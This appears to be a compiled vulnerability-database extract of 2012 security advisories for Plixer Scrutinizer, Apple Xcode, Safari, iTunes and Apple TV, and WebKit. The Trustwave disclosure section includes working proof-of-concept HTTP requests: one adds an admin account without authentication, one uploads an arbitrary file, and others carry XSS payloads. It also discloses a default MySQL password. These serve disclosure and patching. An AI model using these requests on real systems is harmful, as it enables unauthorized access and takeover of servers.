application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format
| VAR-201207-0528 | CVE-2012-2626 | Plixer Scrutinizer (Dell SonicWALL Scrutinizer) Vulnerabilities in adding administrator accounts |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
cgi-bin/admin.cgi in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 does not require token authentication, which allows remote attackers to add administrative accounts via a userprefs action. Scrutinizer is prone to an authentication-bypass vulnerability.
Exploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions.
Scrutinizer 9.5.0 is vulnerable; other versions may also be affected. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting. A remote attacker could exploit this vulnerability to add an administrative account through the manipulation of user preferences. The Trustwave SpiderLabs advisory TWSL2012-014 covering this finding (Finding 1) is reproduced in full under VAR-201207-0529 above.
| VAR-201207-0303 | CVE-2012-3951 | Plixer Scrutinizer (Dell SonicWALL Scrutinizer) Arbitrary SQL command execution vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
The MySQL component in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) 9.0.1.19899 and earlier has a default password of admin for the (1) scrutinizer and (2) scrutremote accounts, which allows remote attackers to execute arbitrary SQL commands via a TCP session. Scrutinizer is prone to a security-bypass vulnerability.
Successful attacks can allow an attacker to gain access to the affected application using the default authentication credentials.
Scrutinizer 9.5.0 is vulnerable; other versions may also be affected. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting. The Trustwave SpiderLabs advisory TWSL2012-014 covering this finding (Finding 4) is reproduced in full under VAR-201207-0529 above.
| VAR-201207-0300 | CVE-2012-3848 | Plixer Scrutinizer (Dell SonicWALL Scrutinizer) Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to d4d/exporters.php, (2) the HTTP Referer header to d4d/exporters.php, or (3) unspecified input to d4d/contextMenu.php. Scrutinizer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Scrutinizer 9.5.0 is vulnerable; other versions may also be affected. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting.
Trustwave SpiderLabs Security Advisory TWSL2012-014:
Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer
Published: 07/27/12
Version: 1.0
Vendor: Plixer International (http://www.plixer.com)
Product: Scrutinizer NetFlow and sFlow Analyzer
Version affected: Confirmed 9.0.1 (Build 9.0.1.19899) and prior versions
may be affected as well. Please note that the software can be found in a
long list of other products. Visit http://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html
for the partial list.
Product description:
Network analysis tool for monitoring the overall network health, reporting
on which hosts, applications, protocols, etc. are consuming network
bandwidth.
Credits:
Mario Ceballos of the Metasploit Project
Jonathan Claudius of Trustwave Spiderlabs
Finding 1: HTTP Authentication Bypass Vulnerability
CVE: CVE-2012-2626
The Scrutinizer web console provides a form-based login facility, requiring
users to authenticate to gain access to further functionality. A tiered
user access model is also used, where administrative and standard users
have a different selection of permissible functions. Authentication and
authorization are controlled by the cookie-based session management system.
Although this is implemented in a standardized way, the session tokens are
not required to perform privileged functions, such as adding users.
Example(s):
This request will add a user named "trustwave" with the password of
"trustwave" to the administrative user group.
#Request
POST /cgi-bin/admin.cgi HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: 70
tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:52:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 19
Content-Type: text/html; charset=utf-8
{"new_user_id":"2"}
Finding 2: Arbitrary File Upload Vulnerability
CVE: CVE-2012-2627
The Scrutinizer web console is prone to an unauthenticated arbitrary file upload
vulnerability. An attacker could exploit this vulnerability to upload files
to the affected system's file system as well as overwrite the Scrutinizer
application's SNMP configuration.
Example(s):
This request will upload a test file to the following location:
'C:\Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt'
Note: This affected folder also contains SNMP configuration files which could
be overwritten if an attacker were to select the right file name.
#Request
POST /d4d/uploader.php HTTP/1.0
Host: A.B.C.D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593
Content-Length: 210
--_Part_949_3365333252_3066945593
Content-Disposition: form-data;
name="uploadedfile"; filename="trustwave.txt"
Content-Type: application/octet-stream
trustwave
--_Part_949_3365333252_3066945593--
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:39:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 41
Connection: close
Content-Type: text/html
{"success":1,"file_name":"trustwave.txt"}
#Confirming on File System
C:\>type "Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt"
trustwave
Finding 3: Multiple Cross-site Scripting Vulnerabilities in exporters.php and contextMenu.php
CVE: CVE-2012-3848
The Scrutinizer web console suffers from multiple Cross Site Scripting
vulnerabilities in the following pages:
1.) /d4d/contextMenu.php
2.) /d4d/exporters.php
These vulnerabilities include the following:
1.) XSS via arbitrary parameter
2.) XSS via Referer header
Example(s):
The following two examples demonstrate the above-mentioned vulnerabilities on exporters.php
#Request 1
GET /d4d/exporters.php?a<script>alert(123)</script>=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
#Response 1
<snip>
<a href="/d4d/exporters.php?a<script>alert(1)</script>=1">/d4d/exporters.php?a<script>alert(123)</script>=1</a></td></tr>
<snip>
#Request 2
GET /d4d/exporters.php HTTP/1.1
Host: A.B.C.D
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1
Content-Length: 2
#Response 2
<snip>
<a href="http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1">http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1</a>
<snip>
Finding 4: Undocumented Default Admin MySQL Users
CVE: CVE-2012-3951
The Scrutinizer application relies on an underlying Apache, MySQL and PHP
installation which is installed as part of the Scrutinizer installer
package. The installation of these packages is transparent to the user
during the Scrutinizer installation.
The installation selects default passwords for internal MySQL users which
are not configured by the user and which could be easily guessed by an
attacker. There is currently no way to change these values within the
Scrutinizer application, and changing them manually in the MySQL instance
has unknown effects on the application due to hardcoded values for some of
these accounts.
Example(s):
The following MySQL command can be run to see the users and their respective
passwords:
#Request
select User,Password from mysql.user;
#Response
User |Password
root |
root |
scrutinizer |*4ACFE3202A5FF5CF467898FC58AAB1D615029441
scrutremote |*4ACFE3202A5FF5CF467898FC58AAB1D615029441
Note 1: the above hash shared between the 'scrutinizer' and 'scrutremote'
users is equivalent to 'admin'
Note 2: the 'scrutinizer' and 'scrutremote' users have select, update,
delete, create, drop, and more permissions within the MySQL instance.
Note 3: By default, the MySQL instance is bound to "0.0.0.0", the
equivalent of every network interface on the system, allowing users with the
proper access rights to interact directly with the MySQL instance.
Remediation Steps:
Customers should update to the latest version of Scrutinizer NetFlow &
sFlow Analyzer in order to address findings 1, 2 and 3. These issues have been
corrected in version 9.5.0.
Revision History:
05/02/12 - Vulnerability disclosed
05/16/12 - Patch released by vendor
07/11/12 - Vendor publishes announcement
07/27/12 - Advisory published
References
1. http://www.plixer.com
2. http://blog.spiderlabs.com
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
| VAR-201207-0679 | No CVE | Kessler Ellis Products Infilink HMI Unauthorized Access Vulnerability |
CVSS V2: - CVSS V3: - Severity: MEDIUM |
Kessler-Ellis is a well-known instrument manufacturer. The Infilink HMI is the Human Machine Interface (HMI) for Kessler-Ellis products. The Kessler Ellis Products Infilink HMI product failed to securely hash the authentication credentials in the project file. This product uses a simple binary XOR process to encrypt the plaintext password, allowing the attacker to simply extract the password information and control the application. Kessler-Ellis Products Infilink-HMI is prone to an unauthorized-access vulnerability.
Local attackers can exploit this issue to gain unauthorized access to the affected application. This may aid in further attacks.
Infilink-HMI 5.00.23 is vulnerable. Infilink HMI is the Kessler-Ellis human machine interface (HMI) product.
| VAR-201207-0093 | CVE-2012-3698 | Apple Xcode Vulnerable to reading keychain entries |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Apple Xcode before 4.4 does not properly compose a designated requirement (DR) during signing of programs that lack bundle identifiers, which allows remote attackers to read keychain entries via a crafted app, as demonstrated by the keychain entries of a (1) helper tool or (2) command-line tool. Apple Xcode improperly composes the designated requirement (DR) used when signing programs that lack a bundle identifier, so keychain entries may be readable. A third party may be able to read keychain entries through a crafted application. Apple Xcode is prone to an information-disclosure vulnerability.
Attackers can leverage this issue to gain access to sensitive information. Information obtained may aid in further attacks. For example, keychain entries of a (1) helper tool or (2) command-line tool.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2012-07-25-2 Xcode 4.4
Xcode 4.4 is now available and addresses the following:
neon
Available for: OS X Lion v10.7.4 and later
Impact: An attacker may be able to decrypt data protected by SSL
Description: There are known attacks on the confidentiality of SSL
3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode.
The neon library (used by Subversion) disabled the 'empty fragment'
countermeasure which prevented these attacks. This issue is addressed
by enabling the countermeasure.
When a Developer ID was used
with Xcode to sign a product that did not have a bundle identifier,
such as a command-line tool or an embedded helper, the generated DR
for the product did not include the developer's ID in the part of the
DR that applies to apps signed by the App Store. As a result, any App
Store app may have accessed keychain items created by the product.
This is addressed by generating a DR with improved checks. Affected
products need to be re-signed with this version of Xcode to include
the improved DR.
CVE-ID
CVE-2012-3698
Xcode 4.4 may be obtained from the Downloads section of the
Apple Developer Connection Member site: http://developer.apple.com/
Login is required, and membership is free.
Xcode 4.4 is also available from the App Store. It is free to anyone
with OS X 10.7.x Lion and later.
The download file is named: "xcode446938108a.dmg"
Its SHA-1 digest is: d04393543564f85c2f4d82e507d596d3070e9aba
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
----------------------------------------------------------------------
TITLE:
Apple Xcode Two Vulnerabilities
SECUNIA ADVISORY ID:
SA50068
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50068/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50068
RELEASE DATE:
2012-07-26
DISCUSS ADVISORY:
http://secunia.com/advisories/50068/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50068/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50068
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A weakness and a vulnerability have been reported in Apple Xcode,
which can be exploited by malicious people to disclose potentially
sensitive information, hijack a user's session, and bypass certain
security restrictions.
1) A design error exists within the implementation of SSL 3.0 and TLS
1.0 protocols.
The weakness and the vulnerability are reported in versions prior to
4.4.
SOLUTION:
Update to version 4.4 via the Apple Developer site or via the App
Store.
PROVIDED AND/OR DISCOVERED BY:
2) Reported by the vendor.
ORIGINAL ADVISORY:
APPLE-SA-2012-07-25-2:
http://support.apple.com/kb/HT5416
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201209-0256 | CVE-2012-3598 | plural Apple Used in products WebKit Vulnerable to arbitrary code execution |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. WebKit is prone to multiple unspecified remote code-execution vulnerabilities.
Attackers can exploit these issues by performing a man-in-the-middle attack. Successful attacks will result in arbitrary code execution; failed attacks may cause denial-of-service conditions.
Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. WebKit is a set of open source web browser engines jointly developed by companies such as KDE, Apple (Apple), and Google (Google), and is currently used by browsers such as Apple Safari and Google Chrome.
============================================================================
Ubuntu Security Notice USN-1617-1
October 25, 2012
webkit vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 LTS
Summary:
Multiple security vulnerabilities were fixed in WebKit.
Software Description:
- webkit: Web content engine library for GTK+
Details:
A large number of security issues were discovered in the WebKit browser and
JavaScript engines.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 12.04 LTS:
libjavascriptcoregtk-1.0-0 1.8.3-0ubuntu0.12.04.1
libjavascriptcoregtk-3.0-0 1.8.3-0ubuntu0.12.04.1
libwebkitgtk-1.0-0 1.8.3-0ubuntu0.12.04.1
libwebkitgtk-3.0-0 1.8.3-0ubuntu0.12.04.1
After a standard system update you need to restart your session to make all
the necessary changes.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2012-09-19-3 Safari 6.0.1
Safari 6.0.1 is now available and addresses the following:
Safari
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8 and v10.8.1
Impact: Opening a maliciously crafted downloaded HTML document may
lead to the disclosure of local file content
Description: In OS X Mountain Lion HTML files were removed from the
unsafe type list. Quarantined HTML documents are opened in a safe
mode that prevents accessing other local or remote resources. A logic
error in Safari's handling of the Quarantine attribute caused the
safe mode not to be triggered on Quarantined files. This issue was
addressed by properly detecting the existence of the Quarantine
attribute.
CVE-ID
CVE-2012-3713 : Aaron Sigel of vtty.com, Masahiro Yamada
Safari
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8 and v10.8.1
Impact: Using Autofill on a maliciously crafted website may lead to
the disclosure of contact information
Description: A rare condition existed in the handling of Form
Autofill. Using Form Autofill on a maliciously crafted website may
have led to disclosure of information from the Address Book "Me" card
that was not included in the Autofill popover. This issue was
addressed by limiting Autofill to the fields contained in the
popover.
CVE-ID
CVE-2012-3714 : Jonathan Hogervorst of Buzzera
Safari
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8 and v10.8.1
Impact: After editing a HTTPS URL in the address bar, a request may
be unexpectedly sent over HTTP
Description: A logic issue existed in the handling of HTTPS URLs in
the address bar. If a portion of the address was edited by pasting
text, the request may be unexpectedly sent over HTTP. This issue was
addressed by improved handling of HTTPS URLs.
CVE-ID
CVE-2012-3715 : Aaron Rhoads of East Watch Services LLC, Pepi
Zawodsky
WebKit
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8 and v10.8.1
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2011-3105 : miaubiz
CVE-2012-2817 : miaubiz
CVE-2012-2818 : miaubiz
CVE-2012-2829 : miaubiz
CVE-2012-2831 : miaubiz
CVE-2012-2842 : miaubiz
CVE-2012-2843 : miaubiz
CVE-2012-3598 : Apple Product Security
CVE-2012-3601 : Martin Barbella of the Google Chrome Security Team
using AddressSanitizer
CVE-2012-3602 : miaubiz
CVE-2012-3606 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3607 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3612 : Skylined of the Google Chrome Security Team
CVE-2012-3613 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3614 : Yong Li of Research In Motion, Inc.
CVE-2012-3616 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3617 : Apple Product Security
CVE-2012-3621 : Skylined of the Google Chrome Security Team
CVE-2012-3622 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3623 : Skylined of the Google Chrome Security Team
CVE-2012-3624 : Skylined of the Google Chrome Security Team
CVE-2012-3632 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3643 : Skylined of the Google Chrome Security Team
CVE-2012-3647 : Skylined of the Google Chrome Security Team
CVE-2012-3648 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3649 : Dominic Cooney of Google and Martin Barbella of the
Google Chrome Security Team
CVE-2012-3651 : Abhishek Arya and Martin Barbella of the Google
Chrome Security Team
CVE-2012-3652 : Martin Barbella of Google Chrome Security Team
CVE-2012-3654 : Skylined of the Google Chrome Security Team
CVE-2012-3657 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3658 : Apple
CVE-2012-3659 : Mario Gomes of netfuzzer.blogspot.com, Abhishek Arya
(Inferno) of the Google Chrome Security Team
CVE-2012-3660 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3671 : Skylined and Martin Barbella of the Google Chrome
Security Team
CVE-2012-3672 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3673 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3675 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3676 : Julien Chaffraix of the Chromium development
community
CVE-2012-3677 : Apple
CVE-2012-3684 : kuzzcc
CVE-2012-3685 : Apple Product Security
CVE-2012-3687 : kuzzcc
CVE-2012-3688 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3692 : Skylined of the Google Chrome Security Team, Apple
Product Security
CVE-2012-3699 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3700 : Apple Product Security
CVE-2012-3701 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3702 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3703 : Apple Product Security
CVE-2012-3704 : Skylined of the Google Chrome Security Team
CVE-2012-3705 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3706 : Apple Product Security
CVE-2012-3707 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3708 : Apple
CVE-2012-3709 : Apple Product Security
CVE-2012-3710 : James Robinson of Google
CVE-2012-3711 : Skylined of the Google Chrome Security Team
CVE-2012-3712 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
For OS X Lion systems Safari 6.0.1 is available via the Apple
Software Update application.
For OS X Mountain Lion systems, Safari 6.0.1 is included with
OS X v10.8.2.
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
----------------------------------------------------------------------
TITLE:
Apple iTunes Multiple WebKit Vulnerabilities
SECUNIA ADVISORY ID:
SA50618
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50618/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50618
RELEASE DATE:
2012-09-13
DISCUSS ADVISORY:
http://secunia.com/advisories/50618/#comments
DESCRIPTION:
Multiple vulnerabilities have been reported in Apple iTunes, which
can be exploited by malicious people to compromise a user's system. No
further information is currently available.
For more information
SA47231
SA47694
SA47938
SA48016
SA48265
SA48274
SA48512
SA48618
SA48732
SA48992
SA49194
SA49277
SA49724
SA49906
SA50058
The vulnerabilities are reported in versions prior to 10.7.
SOLUTION:
Update to version 10.7.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
1) Reported by the vendor.
ORIGINAL ADVISORY:
APPLE-SA-2012-09-12-1:
http://lists.apple.com/archives/security-announce/2012/Sep/msg00001.html
| VAR-201207-0490 | CVE-2012-0683 | plural Apple Used in products WebKit Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. WebKit is prone to multiple unspecified remote code-execution vulnerabilities.
Attackers can exploit these issues by performing a man-in-the-middle attack. Successful attacks will result in arbitrary code execution; failed attacks may cause denial-of-service conditions.
Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems. Vulnerabilities exist in the use of WebKit in versions prior to Apple Safari 6.0.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2012-09-24-1 Apple TV 5.1
Apple TV 5.1 is now available and addresses the following:
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: An uninitialized memory access existed in the handling
of Sorenson encoded movie files. This issue was addressed through
improved memory initialization.
CVE-ID
CVE-2012-3722 : Will Dormann of the CERT/CC
Apple TV
Available for: Apple TV 2nd generation and later
Impact: A malicious Wi-Fi network may be able to determine networks
a device has previously accessed
Description: Upon connecting to a Wi-Fi network, iOS may broadcast
MAC addresses of previously accessed networks per the DNAv4
protocol. This issue was addressed by disabling DNAv4 on unencrypted
Wi-Fi networks
CVE-ID
CVE-2012-3725 : Mark Wuergler of Immunity, Inc.
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of
ThunderScan encoded TIFF images. This issue was addressed by updating
libtiff to version 3.9.5.
CVE-ID
CVE-2011-1167
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted PNG image may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in libpng's
handling of PNG images. These issues were addressed through improved
validation of PNG images.
CVE-ID
CVE-2011-3026 : Juri Aedla
CVE-2011-3048
CVE-2011-3328
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted JPEG image may lead to an
unexpected application termination or arbitrary code execution
Description: A double free issue existed in ImageIO's handling of
JPEG images. This issue was addressed through improved memory
management.
CVE-ID
CVE-2012-3726 : Phil of PKJE Consulting
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted TIFF image may lead to an
unexpected application termination or arbitrary code execution
Description: An integer overflow issue existed in libTIFF's handling
of TIFF images. This issue was addressed through improved validation
of TIFF images. This issue does not affect OS X Mountain Lion
systems.
CVE-ID
CVE-2012-1173
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Applications that use ICU may be vulnerable to an unexpected
application termination or arbitrary code execution
Description: A stack buffer overflow existed in the handling of ICU
locale IDs. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2011-4599
Apple TV
Available for: Apple TV 2nd generation and later
Impact: An attacker with a privileged network position may cause an
unexpected application termination or arbitrary code execution
Description: Multiple vulnerabilities existed in libxml, the most
serious of which may lead to an unexpected application termination or
arbitrary code execution. These issues were addressed by applying the
relevant upstream patches.
CVE-ID
CVE-2011-1944 : Chris Evans of Google Chrome Security Team
CVE-2011-2821 : Yang Dingning of NCNIPC, Graduate University of
Chinese Academy of Sciences
CVE-2011-2834 : Yang Dingning of NCNIPC, Graduate University of
Chinese Academy of Sciences
CVE-2011-3919 : Juri Aedla
Apple TV
Available for: Apple TV 2nd generation and later
Impact: An attacker with a privileged network position may cause an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in
JavaScriptCore. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2012-0682 : Apple Product Security
CVE-2012-0683 : Dave Mandelin of Mozilla
CVE-2012-3589 : Dave Mandelin of Mozilla
CVE-2012-3590 : Apple Product Security
CVE-2012-3591 : Apple Product Security
CVE-2012-3592 : Apple Product Security
CVE-2012-3678 : Apple Product Security
CVE-2012-3679 : Chris Leary of Mozilla
Installation note:
Apple TV will periodically check for software updates. Alternatively,
you may manually check for software updates by selecting
"Settings -> General -> Update Software".
To check the current version of software, select
"Settings -> General -> About".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org
=PSL+
-----END PGP SIGNATURE-----
| VAR-201207-0489 | CVE-2012-0682 | WebKit, as used in multiple Apple products, arbitrary code execution vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. WebKit is prone to multiple unspecified remote code-execution vulnerabilities.
Attackers can exploit these issues by performing a man-in-the-middle attack. Successful attacks will result in arbitrary code execution; failed attacks may cause denial-of-service conditions.
